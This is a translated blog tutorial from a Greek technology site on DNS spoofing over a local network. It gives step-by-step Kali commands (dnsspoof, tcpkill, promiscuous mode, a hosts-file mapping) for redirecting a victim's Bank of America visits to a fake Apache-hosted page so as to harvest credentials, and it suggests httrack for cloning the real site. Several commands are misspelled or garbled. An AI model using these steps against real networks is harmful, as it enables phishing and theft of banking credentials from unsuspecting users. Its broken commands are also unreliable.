DNS Hacking: Local network redirect to our page

In this guide, we will take advantage of Domain Name Service (DNS). As you know, DNS is used to resolve domain names or convert a domain name, such as iguru.gr, to an IP address, 23.236.62.147.

If we can tease this protocol, we could very well send someone looking for a page like www.bankofgreece to our malicious site and harvest their credentials.

dns

Dug Song of the University of Michigan has developed a suite of hacking tools that are well suited for this purpose. We have already used one of its tools, arpspoof, to perform a man-in-the-middle attack. In this attack, we will use the dnsspoof tool, which will allow us to spoof DNS services on a local network.

Remember, even though this breach requires you to be on the same local network, you could gain access to the local network through a remote vulnerability or a weak password on just ONE machine on the network. In institutions with thousands of computers on their network, this means that you need to find a single machine that is exploitable before you can apply this attack to the entire network.

Step 1: Run Kali

Let's start by running Kali.

DNA1

Step 2: Open dnsspoof

Depending on the version of Kali you are using, you may be able to find dnsspoof in the menu under Sniffing, or you can always find it by opening a terminal and typing dnsspoof.

dnspoof -i -f

DNA2

Step 3: Setup for Sniffing

We will try to get a Windows 7 system on our network to redirect its www.bankofamerica.com navigation to our website.

DNA3

Step 4: Clear the DNS cache

First, we need to clear the Windows 7 DNS cache. This way, the Windows client will not use the system's DNS cache and instead use the “up-to-date” DNS service. Actually, this step is not necessary, but we present it to you.

Second, close your browser, open a cmd.exe and type:

c:/ipconfig / flushdns

Now we need to set the network card on the Kali server to promiscuous mode (it, your network card, will accept anyone's packets).

kali > ifconfig eth0 promisc

Now we need to break the connection between the Windows 7 system and www.bankofamerica.com. This forces the user of the Windows 7 machine to re-authenticate. From Kali type:

kali > tcpkill -9 host www.bankamerica.com

After terminating www.bankofamerica.com, stop it tcpkill with Ctrl + C

Step 5: Edit the Hosts file

Here we will use the hosts file to redirect the Windows 7 system search for Bank of America to our website. Let's go to the /etc directory.

kali >cd / Etc

From there, we open the hosts file in any text editor. Let's use leafpad.

kali > leaf pad hosts

DNA4

Now that we have the hosts file open, we need to add the following line to it. Remember, the hosts file just maps an IP address to a domain name, so we put our IP address and map it to www.bankofamerica.com.

192.168.1.101 www.bankofamerica.com

It is important here to use the TAB key between the IP address and the domain. Spaces will be interpreted by the system as part of the domain name.

Step 6: Create a new BoA website

Before we go any further, we now need to disable promiscuous mode on our network card.

kali > ifconfig eth0 -promisc

Now we need to create a website that the user will be taken to when they type www.bankofamerica.com into their browser URL.

If we type the loopback or “home” IP address into our browser, we will see Apache's default web page. This is what we need to replace.

DNA5

Let's create a simple website. Open the index.html file.

kali> leaf pad /var/www/html/index.html

DNA6

This is its default form. We want to change it and put the following html and save it.

DNA7

Of course, if you really wanted to pull off this hack for a real attack, you'd have to take the time to create a website that looks and acts exactly like the website you're spoofing, but that's a whole different scenario. Note that tools like httrack can download and copy entire websites.

Step 7: Start the Apache Web Server

Now, start the web server built into Kali. This is Apache and the service is HTTP, so we go to Kali Linux -> System Services -> HTTP and finally, apache2 start. This will launch the web server on the Kali system that hosts the fake Bank of America website. Of course, if you are more comfortable using the command line, you can start the apache2 webserver by typing:

kali > Services apache2 start

Step 8: Launch Dnsspoof

In our final step, we need to start dnsspoof and direct users to the entries in the “hosts” file first. dnsspoof will intercept DNS queries and send them to the hosts file first before sending them to the DNS server. That way, if we have any entry in our hosts file that the client is looking for, it will be directed as defined by our hosts file.

Remember, we mapped www.bankofamerica.com to our own IP address so they go to our own web server and see our own webpage.

kali > dnspoof -f hosts

DNA8

Step 9: Navigate to BoA from Windows 7

Now, from your Windows 7 system, type the URL www.bankofamerica.com and it will display our fake website versus the real Bank of America website as below.

DNA9

Now, when someone on your local network tries to navigate to the Bank of America website, they'll be taken directly to our website!

As you can imagine, with dnsspoof, we can wreak all kinds of havoc on a local network!

And somewhere here we reached the end of our current guide.

 

iGuRu.gr The Best Technology Site in Greece
Follow us on Google News

DNS hacking

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).